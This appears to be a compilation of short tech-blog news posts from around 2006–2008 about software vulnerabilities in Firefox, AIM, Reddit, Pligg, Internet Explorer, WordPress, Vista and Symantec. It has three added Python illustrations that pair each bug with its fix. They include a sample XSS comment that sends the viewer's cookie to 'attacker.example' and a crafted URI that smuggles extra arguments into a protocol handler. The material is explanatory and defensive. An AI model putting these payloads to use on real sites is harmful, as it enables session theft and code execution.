Remember that whole Firefox Download Day thing that we all got so amped up about? Us too.
Remember when their servers screwed the pooch for most of "Download Day"? Us too.
How about that vulnerability that affected all 8 zillion of us who downloaded version 3? Yep, we remember that too.
Now you can put all those rough memories behind you and sleep easy. Today, Mozilla "officially" announced that it set the record, with 8,002,530 downloads on the release day of Firefox 3. It's fair to point out that nothing was broken here... this was a new record, hence "setting" and not "breaking".
Will you remember Mozilla set the Guinness World Record for the most software downloads in 24 hours on June 18th, 2008? Neither will we.
But congrats on still being #2, Firefox. Let us know when that changes and we'll jump around and party like it's 2035!
Core Security's Aviv Raff reports that AOL's AIM client has a severe vulnerability. An attacker can send an instant message containing code that executes on your computer. You don't even have to click a link. As long as you're accepting incoming messages, an attacker could wreak havoc on your system.
In a demonstration, Raff sent ZDNet's Ryan Naraine a message that caused his Windows calculator to open. AOL is working on a patch, and recommends users upgrade to the latest beta version of AIM. But Raff says that so far each patch that has been issued has been easily circumvented.
AOL says a full solution will be available by mid-October. In the meantime, we recommend rejecting messages from any unknown source and hoping that your buddies aren't running infected PCs. And if you want to be extra careful, you can access your buddy list using an alternative program like Meebo, Pidgin, or Trillian.
The problem is that Firefox "did not percent-encode spaces and double-quotes in URIs handed off to external programs." Because a double-quote in a link was passed through unescaped, a crafted URI could break out of the quoted argument and smuggle extra command-line options to the external program that handles it. Essentially that means a malicious web site could launch arbitrary code on your computer when visited with the Firefox browser.
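As an added illustration (not code from the original post or from Mozilla), the snippet below shows the class of bug the quoted fix addresses: a URI containing a double-quote breaks out of the quoted argument when the registered handler command is built, and percent-encoding the space and quote keeps the whole URI a single argument. The handler name, command template and hostile URI are constructed for the example, and POSIX-style splitting (shlex) stands in for the launched program's own argument parsing.

```python
import shlex

# Constructed for this example: the command template a protocol handler might be
# registered with ("%1" is replaced by the URI), and a hostile URI a web page could link to.
HANDLER_TEMPLATE = 'handler.exe "%1"'
HOSTILE_URI = 'mailto:someone@example.com" -evilflag "http://attacker.example/'


def escape_for_external_handler(uri):
    """Percent-encode the two characters the Firefox 2.0.0.6 fix targets: space and double-quote.

    Only those two are touched, so existing %XX escapes in the URI are left alone.
    """
    return uri.replace(' ', '%20').replace('"', '%22')


def build_handler_command(template, uri, escape):
    """Substitute the URI into the template and split the result into the argv the
    external program would receive. shlex (POSIX rules) approximates the real
    platform's command-line parsing; the break-out effect is the same."""
    if escape:
        uri = escape_for_external_handler(uri)
    return shlex.split(template.replace('%1', uri))


def injected_arguments(argv):
    """Return any argv entries beyond the program name and the single URI argument.

    A non-empty result means the URI smuggled extra command-line options in."""
    return argv[2:]


if __name__ == '__main__':
    for escape in (False, True):
        argv = build_handler_command(HANDLER_TEMPLATE, HOSTILE_URI, escape)
        label = 'escaped' if escape else 'raw    '
        print(label, argv, 'injected:', injected_arguments(argv))
```

Run raw, the handler sees four arguments, two of which the page author chose; run escaped, it sees exactly one URI, which the handler can then decode itself.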
Odds are you'll get the update through Firefox's auto-update feature. But if your browser hasn't prompted you to download Firefox 2.0.0.6 yet, you can grab it from the Firefox homepage.
It hasn't been a good weekend for social ranking sites. Security vulnerabilities were uncovered at Digg-competitor Reddit and Pligg, a site that lets you create your own Digg clone. The security problems at each site were unrelated and have been patched.
Basically, the problem at Reddit was that the site let users post script code in their comments; that code ran in the browser of anyone who viewed the comment and could be used to grab the viewer's account login and other information. For the most part, Reddit users played with the vulnerability by posting benign code. The hole has been fixed, and any user who posted such code has had the text replaced with "I am a terrible person."
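To make the class of bug concrete, here is an added example (not Reddit's code): a comment rendered straight into the page versus the same comment run through an HTML escaper, with a constructed payload that would ship each viewer's cookie to a site the commenter controls. The template, comments and attacker host are all made up for the example.

```python
import html
import re

# Constructed sample comment: a script that would run in every viewer's browser and
# send their session cookie to a host the commenter controls.
HOSTILE_COMMENT = (
    'nice post <script>'
    'new Image().src="http://attacker.example/?c="+encodeURIComponent(document.cookie)'
    '</script>'
)
# Constructed benign comment that happens to contain markup-significant characters.
BENIGN_COMMENT = 'I think 1 < 2 & "quotes" are fine'

TEMPLATE = '<div class="comment">{body}</div>'


def render_comment_unsafe(body):
    """The vulnerable pattern: user text interpolated into markup verbatim."""
    return TEMPLATE.format(body=body)


def render_comment_escaped(body):
    """The fix: escape &, <, >, " and ' so the text can only ever be text."""
    return TEMPLATE.format(body=html.escape(body, quote=True))


SCRIPT_TAG = re.compile(r'<\s*script\b', re.IGNORECASE)


def contains_live_script(markup):
    """Crude detection used here only to show the difference: does a real
    <script> tag survive into the rendered page? The escaper is the fix."""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == '__main__':
    for render in (render_comment_unsafe, render_comment_escaped):
        out = render(HOSTILE_COMMENT)
        print(render.__name__, 'live script:', contains_live_script(out))
        print('   ', out)
```

Escaping at render time is the right layer: filtering "bad" input on the way in is what Reddit's attackers were playing around, whereas output escaping turns every character the browser might interpret into inert text.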
The Pligg vulnerability was even more serious, allowing an attacker to take over an entire website. Pligg has released a patch, and recommends anyone running a Pligg site upgrade immediately.
You know those web sites that have kooky animated cursors? Yeah, don't surf to those with Internet Explorer unless you want to leave your computer vulnerable to hackers.
Microsoft has issued a notice that it is investigating the vulnerability. If users visit a web site or view an e-mail containing a malformed .ani file (the animated cursor file type), an attacker can compromise their machine, so Microsoft's advice for the moment is: be careful when opening unsolicited emails or browsing new web sites. A long-term fix is still a few steps away.
The vulnerability appears to affect Internet Explorer 6 and 7 running on Windows XP SP2. IE7 on Vista doesn't appear to be affected.
Breaking news on the internets right now as Matt over at WordPress is reporting some serious issues with packages of WordPress 2.1.1 downloaded over the past 3-4 days. According to a blog post, a malicious intruder gained access to the wordpress.org servers and modified the files being made available for download. How exactly this happened is still unknown.
The long and short of the situation is this: if you downloaded and installed the most recent version of WordPress from wordpress.org in the last few days, you weren't downloading the official release; you were downloading a modified version that likely includes some sort of back door.
Although only a subset of the 2.1.1 copies in the wild contain the modified code, the development team has declared the entire release "dangerous," and strongly recommends all users upgrade to 2.1.2.
Brian Krebs at the Washington Post's Security Fix blog wanted to put together some statistics on how long it took major software providers to fix vulnerabilities last year. He started with Microsoft, and found that Internet Explorer was vulnerable to critical flaws for a total of 284 days. That's more than 9 months.
In fact, there were at least 98 days when Microsoft had not issued a fix even though criminals were actively exploiting some of those flaws to grab personal data from Internet Explorer users.
Krebs says he ran his data by Microsoft before posting it on the blog, and that aside from some minor issues, the company didn't bring up anything that would change the overall finding.
By comparison, Firefox was only vulnerable to a serious security threat for one 9-day period last year. Be sure to tune in tomorrow when Krebs plans to take a look at the number of security patches issued for Microsoft Office in 2006.
About a month after the business release of Windows Vista, and a month before its consumer release, hackers and security researchers have uncovered at least six major security flaws in Microsoft's brand new operating system, the New York Times is reporting. Among flaws discovered are one that allows malicious sites to install malware on a victim's computer and one that allows user permissions to be altered on a corporate network, which could allow malware to be installed without authorization. In addition, one Japanese hacker is offering to sell Vista security flaws for $50,000.
I'm not sure whether Microsoft will have a chance to update Vista before it ships to consumers on January 31, or whether they will package fixes as mandatory updates that will be installed as soon as a new Vista PC connects to the internet. Or whether they'll just plug their ears and continue to proclaim that Vista is the most secure OS ever.
According to security firm Secunia, the just-released Internet Explorer 7 contains a "Redirection Information Disclosure" vulnerability, which lets one site read data from another site through the browser and so opens the door to all kinds of cross-site scripting (XSS) attacks. Interestingly, the same vulnerability has been known and unpatched in IE6 since April. It's one thing not to patch an old browser, but it seems quite another to release a brand new browser with the same vulnerability that you've been aware of for six months. If you're running Internet Explorer and want to see the exploit in action, Secunia has set up a demo page.
Nick Bradbury is a good guy. You can get an idea of this by searching on his name in Technorati, and seeing what other bloggers have to say about him. The reason I bring this up is that I was blown away by the way in which Nick tackled the recent revelation that there is a security vulnerability in almost all current RSS aggregators that could allow a nefarious publisher to get a script to run on the reader's computer. Nick is the developer behind the absolutely excellent FeedDemon feed reader, which NewsGator purchased about a year ago. In Nick's case, due to the manner in which he uses Internet Explorer's rendering engine in "Internet Zone" mode, the exploit doesn't work on FeedDemon. That fact notwithstanding, Nick dove into the problem and came up with a fix to eliminate the vulnerability altogether. The new version of FeedDemon, 2.0.0.25, is available as of today, and includes a substantial performance enhancement.
All that is well and good, and for those of us that own a copy of FeedDemon the new version is a very worthwhile upgrade. But that's not what this story is about.
Have you ever wondered why Firefox makes you wait three seconds before you can click on the Install button when you want to install an extension? Most users (myself included) assume that it's just to make users read the dialog. It turns out that's not the case: Jesse Ruderman explains that it's actually a security feature to keep people from unwittingly installing malicious code. He describes an ingenious exploit in which a user is presented with, for example, a security (CAPTCHA) image to type in. JavaScript initiates an extension installation as soon as the user starts typing, and when the user then types 'y' or Enter, the keystroke lands on the 'Accept' or 'Install' button, allowing the malicious software to be installed. Since many users type faster than they could react to a box popping up, the software is installed before they notice. (If you're confused, head over to Ruderman's blog; he explains it better than I can.) The delay in Firefox gives the user time to react and stop typing. Mozilla describes the solution in bug 162020, but the same vulnerability exists in other browsers, most notably Internet Explorer and its ilk.
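To show the timing race in numbers, here is an added simulation (not Ruderman's or Mozilla's code): a dialog whose Accept button ignores keystrokes until a delay has elapsed since it appeared, fed a constructed keystroke timeline of someone typing a CAPTCHA answer. The keystroke timings, the set of accepting keys and the three-second figure are assumptions for the example.

```python
# Constructed for this example: the hostile page starts the install on the first
# keystroke, so the dialog opens at t=0 and every later key lands on it. Times are
# seconds since the first keystroke; a fast typist hits the next key every ~130 ms.
FAST_TYPIST = [(0.00, 'h'), (0.12, 'e'), (0.25, 'y'), (0.38, '\n'), (0.52, 'z')]
# A user who waits and then deliberately confirms the dialog.
DELIBERATE_USER = [(3.40, 'y')]

ACCEPT_KEYS = {'y', '\n'}  # keys that would activate the default/Accept button (assumption)


class InstallDialog:
    """Install prompt with a security delay: Accept is dead until `delay` seconds
    have passed since the dialog was shown."""

    def __init__(self, opened_at, delay):
        self.opened_at = opened_at
        self.delay = delay
        self.installed = False

    def keypress(self, t, key):
        """Return True if this keystroke triggers the install."""
        if key not in ACCEPT_KEYS:
            return False
        if t - self.opened_at < self.delay:
            return False  # button still disabled: the keystroke is swallowed
        self.installed = True
        return True


def simulate(delay, keystrokes, opened_at=0.0):
    """Feed a keystroke timeline to a dialog; report whether it was accepted and when."""
    dialog = InstallDialog(opened_at, delay)
    for t, key in keystrokes:
        if dialog.keypress(t, key):
            return True, t
    return False, None


if __name__ == '__main__':
    print('no delay, fast typist:  ', simulate(0.0, FAST_TYPIST))
    print('3 s delay, fast typist: ', simulate(3.0, FAST_TYPIST))
    print('3 s delay, deliberate:  ', simulate(3.0, DELIBERATE_USER))
```

With no delay the 'y' at 250 ms installs the extension before the user has had a chance to see the dialog; with the three-second delay every keystroke from the burst of typing is swallowed, and only a confirmation made well after the dialog appeared goes through.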
Symantec moved quickly to squash a security vulnerability in its AntiVirus Corporate Edition which was disclosed by eEye Digital Security last week, and according to CRN Australia an official fix is now being rolled out in the form of an IPS signature update. An unnamed executive from another security vendor, however, says they are "scratching their heads in disbelief" regarding the choice, because hackers could reverse-engineer the signatures and get "a blueprint of the vulnerability." It seems to me that any fix released could likewise be reverse-engineered, but it may be true that an IPS signature is easier to dissect. Let's just hope all of those Corporate users have their AntiVirus set to keep those signatures up-to-date.
According to eEye Digital Security, the latest version of Symantec AntiVirus contains a security flaw that could be used to take control of the victim's PC "without any user action." eEye spokesperson Mike Puterbaugh describes the hole as "definitely wormable," i.e. malicious software could gain access to a machine, change or delete files at will, and spread itself to other machines. Symantec says they "are evaluating the issue now and, if necessary, will provide a prompt response and solution." Puterbaugh says no proof-of-concept code has been released, but warns that hackers may already know about the flaw.
Microsoft's Patch Tuesday last week meant a sigh of relief for sysadmins dreading the nasty Internet Explorer vulnerability discovered last month, but any relief was short-lived as the round of patches has apparently led to a plague of bugs and incompatibilities. Last week's patches are "causing system hangs, Windows crashes and the appearance of strange dialog boxes" and interfering with apps from Google, HP, and even Microsoft's own Windows Media Player. One company is also saying that the new Internet Explorer plugin behavior resulting from Microsoft's patent dispute with Eolas is causing problems for enterprise customers, who are having to click several times to use ActiveX controls. As usual, none of these problems will be fixed until the second Tuesday of next month.
Rather than wait two more weeks until Patch Tuesday as Microsoft has opted to do, two companies have released their own unofficial patches for the newly-disclosed Internet Explorer vulnerability that is rapidly being exploited in the wild. Security firms eEye and Determina have both announced the availability of unofficial hotfixes that they're touting as temporary solutions until Microsoft gets its act together. Both companies have released the source code of their patches for review, but installing either is still an at-your-own-risk undertaking. eEye's information and download page can be found here, and Determina's here.